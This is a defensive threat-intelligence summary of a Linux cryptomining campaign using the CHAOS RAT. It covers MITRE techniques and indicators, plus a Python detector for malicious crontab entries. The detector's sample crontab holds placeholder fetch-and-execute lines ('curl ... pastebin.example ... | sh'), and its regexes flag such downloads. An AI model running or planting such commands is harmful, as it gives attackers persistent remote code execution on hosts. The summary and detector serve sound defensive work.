Trend Micro intercepted a Linux cryptomining campaign that now incorporates the CHAOS Remote Administrative Tool (CHAOSRAT) to enhance control over infected hosts. The operation persists via cron-based mechanisms, downloads XMRig and the RAT from distributed sources, and uses a Russia-based downloader server with a Hong Kong C2, underscoring evolving cloud-based threat activity.
#CHAOSRAT #Kinsing #TeamTNT #XMRig #Pastebin #Russia #HongKong
Key points
- The attack blends cryptocurrency mining with a remote access Trojan (CHAOSRAT), continuing a pattern of Linux cryptojacking in cloud environments.
- The operators attempt to disable competing malware and security products to protect mining performance (defense evasion).
- Persistence is achieved by altering /etc/crontab to download the malware every 10 minutes from Pastebin.
- Following persistence, the campaign downloads additional payloads, including an XMRig miner, its config, a “competition killer” script, and CHAOSRAT itself.
- The main downloader/downloading infrastructure appears Russia-based, while CHAOSRAT connects to a C2 server likely located in Hong Kong using JWT for authentication.
- CHAOSRAT is a Go binary offering remote capabilities such as reverse shells, file operations, screen capture, OS info, and more, with address/token hardcoded as compilation flags.
MITRE Techniques
- [T1053.005] Cron – Persistence via UNIX cron: “The malware achieves its persistence by altering /etc/crontab file, a UNIX task scheduler that, in this case, downloads itself every 10 minutes from Pastebin.”
- [T1105] Ingress Tool Transfer – Downloading payloads: “This is followed by downloading additional payloads: an XMRig miner, its configuration file, a shell script looping ‘competition killer,’ and most importantly, the RAT itself.”
- [T1113] Screen Capture – Remote screen capture: “Take screenshots.”
- [T1219] Remote Access Software – Remote control capabilities via CHAOSRAT: “The RAT is a Go-compiled binary with the following functions: Perform reverse shell, Download files, Upload files, Delete files, Take screenshots, Access file explorer, Gather operating system information, Restart the PC, Shutdown the PC, Open a URL.”
- [T1082] System Information Discovery – Information gathering: “Gather operating system information.”
- [T1071.001] Web Protocols – C2 communication: “connects to the C&C server via its address, and default port, using a JSON Web Token (JWT) for authorization.”
- [T1562.001] Impair Defenses – Disable competing tools: “terminating competing malware such as Kinsing and the killing of resources that influence cryptocurrency mining performance remained unchanged.”
- [T1059.004] Unix Shell – Reverse shell capability: “Perform reverse shell.”
- [T1107] File Deletion – File removal capability: “Delete files.”
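The cron persistence described above (a system crontab entry that re-fetches the loader from Pastebin every 10 minutes) is a good candidate for a host-side check. The following is an added detection example, not code from Trend Micro's report: it parses system-crontab lines and flags entries that fetch from a paste site and hand the result to a shell. The sample crontab and the pastebin.example URL are constructed placeholders, not real indicators.

```python
import re

# Constructed sample /etc/crontab (not taken from the report); the
# pastebin.example host and PLACEHOLDER path are stand-ins, not real IoCs.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/10 * * * * root curl -fsSL https://pastebin.example/raw/PLACEHOLDER | sh
0 3 * * * root wget -q -O /tmp/update https://pastebin.example/raw/PLACEHOLDER && sh /tmp/update
"""

# System crontab layout: five schedule fields, a user field, then the command.
CRON_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# Fetched content piped or chained into an interpreter: "| sh", "&& sh /tmp/x", "; bash"
EXEC_SINK = re.compile(r"(\||&&|;)\s*(sh|bash|python\d?|perl)\b")


def every_n_minutes(minute_field: str):
    """Return N when the minute field is '*/N' (e.g. 10 for the report's cadence), else None."""
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None


def suspicious_cron_entries(crontab_text: str, paste_hosts=("pastebin",)):
    """Flag system-crontab entries that download from a paste site and execute the result."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        # Skip blanks, comments and VAR=value assignments (SHELL=, PATH=, ...)
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        minute, user, cmd = m.group(1), m.group(6), m.group(7)
        fetches_paste = DOWNLOADER.search(cmd) and any(h in cmd.lower() for h in paste_hosts)
        if fetches_paste and EXEC_SINK.search(cmd):
            hits.append({"user": user, "interval_min": every_n_minutes(minute), "command": cmd})
    return hits


if __name__ == "__main__":
    for hit in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(hit)
```

Run it against the real /etc/crontab (and /etc/cron.d/*) contents on a suspect host; the stock run-parts entries are ignored while both placeholder paste-site entries are reported, the first with the 10-minute cadence the report describes.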
Indicators of Compromise
- [Domain] Pastebin – usage to host and fetch payloads for persistence and updates, e.g., “downloads itself every 10 minutes from Pastebin.”
- [Domain] GitHub – CHAOSRAT resources and function references mentioned on a GitHub page: “GitHub page for CHAOS RAT showing some of its functions.”
Read more: https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html